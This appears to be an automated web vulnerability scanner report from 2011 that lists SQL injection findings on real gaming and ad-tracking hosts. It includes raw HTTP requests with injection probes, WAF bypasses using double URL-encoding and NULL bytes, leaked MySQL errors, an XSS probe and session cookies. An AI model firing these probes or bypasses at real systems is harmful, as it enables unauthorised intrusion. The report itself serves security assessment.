SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1 Host: assets.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 234 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:02:09 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html' and 1=1-- was not found o ...[SNIP]... </p> </body></html>
Request 2
GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1 Host: assets.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 325 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:02:09 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html' and 1=2-- was not found o ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb'%20and%201%3d1--%20/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 235 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:54 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb' and 1=1-- /sync-min.html/ was not found ...[SNIP]... </p> </body></html>
Request 2
GET /static/rtb'%20and%201%3d2--%20/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 326 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:54 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb' and 1=2-- /sync-min.html/ was not found ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 21123539'%20or%201%3d1--%20 and 21123539'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb/sync-min.html21123539'%20or%201%3d1--%20/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 242 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html21123539' or 1=1-- / was not ...[SNIP]... </p> </body></html>
Request 2
GET /static/rtb/sync-min.html21123539'%20or%201%3d2--%20/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 333 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html21123539' or 1=2-- / was not ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://clubpogo-games.pogo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17880153%20or%201%3d1--%20 and 17880153%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?117880153%20or%201%3d1--%20=1 HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /?117880153%20or%201%3d2--%20=1 HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The ahst parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ahst parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ahst request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com%2527&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The apid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules%2527&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The rkey parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rkey parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357'&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%00'; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:45 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 ...[SNIP]...
Request 2
GET /1x1.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:48 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif
GIF89a...................!.......,...........T..;
1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://link.mavnt.com
Path:
/1x1.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 /var/d ...[SNIP]...
Request 2
GET /1x1.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif
The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1_map.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:37 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 ...[SNIP]...
Request 2
GET /1x1_map.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:39 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif
GIF89a...................!.......,...........T..;
1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://link.mavnt.com
Path:
/1x1_map.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1_map.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 /var/d ...[SNIP]...
Request 2
GET /1x1_map.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif
The ses15 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ses15 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /a/4252/4762/6670-15.js?cb= HTTP/1.1 Host: optimized-by.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ses15=4762^2'; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;
Response 1
HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html
<html><body><h1>504 Gateway Time-out</h1> The server didn't respond in time. </body></html>
Request 2
GET /a/4252/4762/6670-15.js?cb= HTTP/1.1 Host: optimized-by.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ses15=4762^2''; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:40 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106459; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^2^1294536315^1294539940; expires=Sun, 16-Jan-2011 02:25:40 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391
The rsid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rsid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:13:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2
Request 2
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 2
